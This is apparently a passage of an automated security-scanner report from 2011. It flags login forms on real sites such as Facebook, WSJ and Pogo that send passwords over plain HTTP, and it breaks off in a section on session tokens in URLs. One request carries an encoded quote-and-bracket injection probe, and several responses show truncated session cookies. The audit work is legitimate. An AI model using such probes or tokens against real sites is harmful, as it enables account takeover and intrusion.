HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=131fd88d10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://diythemes.com Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... </h4> <form id="login_form" class="control_box" action="http://diythemes <p> ...[SNIP]... <p><input class="text_input" type="password" name="amember_pass" value="Password" onfocus="if (this.value == 'Password') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Password';}" /></p> ...[SNIP]... |
5.3. http://mail.cmsinter.net/Login.aspx previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://mail.cmsinter.net |
Path: | /Login.aspx |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://mail.cmsinter.net
/Login.aspx
- txtPassword
Request
GET /Login.aspx HTTP/1.1 Host: mail.cmsinter.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=215573381 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8153 <!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN" > <html> <head> <title>Login</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" ...[SNIP]... <body onload="CheckForParent(); SetFocus()"> <form name="login" method="post" action="Login.aspx" id="login"> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> ...[SNIP]... <td style="HEIGHT: 21px"><input name="txtPassword" type="password" id="txtPassword" onkeypress="return stopEnter()" onfocus="ClearPassword()" tabIndex="4" maxlength="31" class="inputTextMedT ...[SNIP]... |
5.4. http://malsup.com/jquery/form/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://malsup.com/jquery
/form/dummy.php
- password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </h3> <form id="validateForm3" action="dummy.php" method="post"><div> ...[SNIP]... <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Submit" /> ...[SNIP]... |
5.5. http://malsup.com/jquery/form/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://malsup.com/jquery
/form/dummy2.php
- Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </pre> <form id="myForm2" action="dummy2.php" method="post"><div> ...[SNIP]... <td><input name="Password" type="password" /></td> ...[SNIP]... |
5.6. http://malsup.com/jquery/form/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://malsup.com/jquery
/form/dummy.php
- password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </h3> <form id="validateForm1" action="dummy.php" method="post"><div> ...[SNIP]... <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Submit" /> ...[SNIP]... |
5.7. http://malsup.com/jquery/form/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://malsup.com/jquery
/form/dummy.php
- Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... <br /> <form id="test" action="dummy.php" method="post"><div> ...[SNIP]... <td><input name="Password" type="password" value="" /></td> ...[SNIP]... |
5.8. http://malsup.com/jquery/form/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://malsup.com/jquery
/form/dummy.php
- Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </pre> <form id="myForm1" action="dummy.php" method="post"><div> ...[SNIP]... <td><input name="Password" type="password" /></td> ...[SNIP]... |
5.9. http://malsup.com/jquery/form/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://malsup.com/jquery
/form/dummy.php
- password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </h3> <form id="validateForm2" action="dummy.php" method="post"><div> ...[SNIP]... <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Submit" /> ...[SNIP]... |
5.10. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://online.wsj.com |
Path: | /article/SB100014240 |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://online.wsj.com
/article/SB100014240 52748704415104576066 830729058232.html
- passwordReg
- passwordConfirmationReg
Request
GET /article/SB100014240 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form name="freeRegistration <ul class="regForms"> ...[SNIP]... </label> <input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" /> </div> ...[SNIP]... </label> <input type="password" name="passwordConfir </div> ...[SNIP]... |
5.11. http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://online.wsj.com |
Path: | /article/SB100014240 |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://commerce.wsj.com
/auth/submitlogin
- password
Request
GET /article/SB100014240 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:36 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=aa545813-1265 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST Cache-Control: max-age=15 Expires: Sun, 09 Jan 2011 01:21:51 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=46 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 139880 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </h4> <form action="http://commerce <fieldset> ...[SNIP]... </label> <input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/> <input type="hidden" name="url" id="page_url" value=""/> ...[SNIP]... |
5.12. http://revver.com/video/426755/peanut-labs/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://revver.com |
Path: | /video/426755/peanut-labs |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://revver.com/account
/login/?next=/video /426755/peanut-labs/
- password
Request
GET /video/426755/peanut-labs Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:22 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 02:33:33 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:28:33 GMT ETag: b8fdf6d76062d0f9cc23 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81237 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <div class="login-form-area"> <form action="/account/login/ <ul class="inline-form clearfix" style=""> ...[SNIP]... </label> <input id="password" name="password" type="password" /></li> ...[SNIP]... |
5.13. http://themeforest.net/user/freshface/portfolio previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://themeforest.net |
Path: | /user/freshface/portfolio |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://themeforest.net
/signin/authenticate
- password
Request
GET /user/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:28:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "7d3f05bdfbd104cc41c X-Runtime: 174 Content-Length: 34838 Set-Cookie: referring_user=-1; domain=.themeforest.net; path=/; expires=Sat, 09-Apr-2011 03:28:47 GMT Set-Cookie: _fd_session=BAh7BzoU Cache-Control: private, max-age=0, must-revalidate <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link href="h ...[SNIP]... <div id="user-bar"> <form action="/signin <a href="/signup" class="sprite input-link-dark"> ...[SNIP]... <input id="username" name="username" type="text" class="signinbar-input" value="username" onclick="this.value = ''"/> <input id="password" name="password" type="password" class="signinbar-input" value="123456" onfocus="this.value = ''" onclick="this.value = ''"/> <button class="submit-button-dark ...[SNIP]... |
5.14. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://wordpress.org |
Path: | /extend/plugins/wp |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://wordpress.org
/extend/plugins/bb-login .php
- password
Request
GET /extend/plugins/wp Host: wordpress.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 09 Jan 2011 02:29:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding Content-Length: 23436 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </h2> <form class="login" method="post" action="http://wordpress <p> ...[SNIP]... <label>Password <input class="text" name="password" type="password" id="password" size="13" maxlength="40" /> </label> ...[SNIP]... |
5.15. http://www.43things.com/person/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.43things.com |
Path: | /person/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.43things.com
/auth/login
- person[password]
Request
GET /person/ HTTP/1.1 Host: www.43things.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 01:38:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4 X-Runtime: 0.00959 Cache-Control: no-cache Set-Cookie: ubid=ShCp%2FqO8Bd Set-Cookie: auth=Zaocciefe2iud12 Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _session_id=c7e240c8 Content-Length: 13687 Status: 404 Not Found Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:38:28 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>43 Things</title> <m ...[SNIP]... </div> <form name="existingAccount" action="/auth/login" method="post" onsubmit="new Ajax.Updater('overlay', '/auth/loginjs', {asynchronous:true, evalScripts:true, onLoading:function <table class="login-form"> ...[SNIP]... <td align="left" style="background:url( ...[SNIP]... |
5.16. http://www.facebook.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.facebook.com/
- reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=ac4nTYEA6yNv1vk |
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=BqNeE; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 09 Jan 2011 01:43:42 GMT Content-Length: 29867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){ ...[SNIP]... <div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div> ...[SNIP]... |
5.17. http://www.mlive.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.mlive.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.mlive.com/
- password
Request
GET / HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:45 GMT Date: Sun, 09 Jan 2011 01:44:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107391 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <div class="top"> <form id="ToprailSigninForm" name="ToprailSignInForm" method="post" action="" onsubmit="document <input type="hidden" name="__mode" value="do_login" /> ...[SNIP]... </label> <input type="password" id="tr_login_password" name="password" value="" class="field" size="30" /> </div> ...[SNIP]... |
5.18. http://www.onestat.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.onestat.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.onestat.com
/Default.aspx
- MemberLoginCompact1
$Login1$Password
Request
GET / HTTP/1.1 Host: www.onestat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 02:31:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml" X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: UILanguage=en; expires=Sat, 09-Jan-2016 02:31:56 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 19494 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> OneStat.com We ...[SNIP]... <div class="container"> <form name="form1" method="post" action="Default.aspx" id="form1"> <div> ...[SNIP]... <td><input name="MemberLoginCompact1 ...[SNIP]... |
5.19. http://www.peanutlabs.com/adminLogin.php previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /adminLogin.php |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.peanutlabs.com
/?cmd=admin_login
- varPassword
Request
GET /adminLogin.php HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:06:55 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Content-Length: 2615 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div class="topLarge"> <form name="" method="POST" action="?cmd=admin_login" <div class=""> ...[SNIP]... <td><input class="border inputField200" name="varPassword" type="password"></td> ...[SNIP]... |
5.20. http://www.pogo.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.pogo.com
/action/pogo/lightreg /module.do?pageSection =Home-reg-module-3
- password
- password_confirm
Request
GET /?sl=2&f9258%22%3E Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.supressGiftLayer Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 01:55:14 GMT Server: Apache-Coyote/1.1 Content-Length: 429533 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div align="center" id="marketing"> <form name="regSignupform" method="POST" action="/action/pogo <div id="regmodWrapper"> ...[SNIP]... <br/> <input type="password" name="password" maxlength="16" tabindex="2" value="" class="field" id="choosePassword" title="Choose a password"><br/> <input type="password" name="password_confirm" maxlength="16" tabindex="3" value="" class="field" id="confirmPassword" title="Re-enter your password"><br /> ...[SNIP]... |
5.21. http://www.pogo.com/account/verify-password.do previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /account/verify-password |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.pogo.com
/account/verify-password .do
- password
Request
GET /account/verify-password Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:26:27 GMT Server: Apache-Coyote/1.1 Content-Length: 21370 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </script> <form name="my-account-form" method="post" action="/account/verify <div class="page-hdr-wrapper"> ...[SNIP]... </label> <input type="password" name="password" maxlength="16" tabindex="1" value="" style="width:200px;margin <div class="clear"> ...[SNIP]... |
5.22. http://www.pogo.com/action/pogo/lightregview.do previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/lightregview |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.pogo.com
/action/pogo/lightreg.do
- password
- password_confirm
Request
GET /action/pogo/lightregview Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:25:26 GMT Server: Apache-Coyote/1.1 Content-Length: 43913 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div style="position:absolute; visibility:hidden;"> <form name="regSignupform" method="POST" action="/action/pogo <input type="hidden" name="site" value="pogo"> ...[SNIP]... </label> <input type="password" name="password" maxlength="16" tabindex="2" value="" class="reg inl"> <a href="javascript:void(0)" onclick="showLayer('popup ...[SNIP]... </label> <input type="password" name="password_confirm" maxlength="16" tabindex="3" value="" class="reg inl"> <div class="clear10"> ...[SNIP]... |
5.23. http://www.rockband.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.rockband.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.rockband.com/
- password
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... <div id="sign_in_form <form> username: <input type="text" name="username" id="username" /> password: <input type="password" name="password" id="password" /> remember me: <input type="checkbox" name="remember" id="remember" value="true" /> ...[SNIP]... |
5.24. http://www.xanga.com/ previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.xanga.com |
Path: | / |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.xanga.com
/default.aspx
- XangaHeader$txtSigni
nPassword
Request
GET / HTTP/1.1 Host: www.xanga.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: fp-promo-count=1 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:44:13 GMT Connection: close Content-Length: 82140 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... <div class="modulecontent"> <form id="SigninForm" class="Form1" method="post" action="http://www.xanga <input name="IsPostBack" type="hidden" id="IsPostBack" /> ...[SNIP]... <div class="itembody"> <input name="XangaHeader <a id="signin" href="javascript: SigninSubmit();" tabindex="3"> ...[SNIP]... |
6. Session token in URL previous next
There are 3 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.6.1. http://www.facebook.com/extern/login_status.php previous next
Summary
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
Issue detail
The URL in the request appears to contain a session token within the query string:- http://www.facebook.com
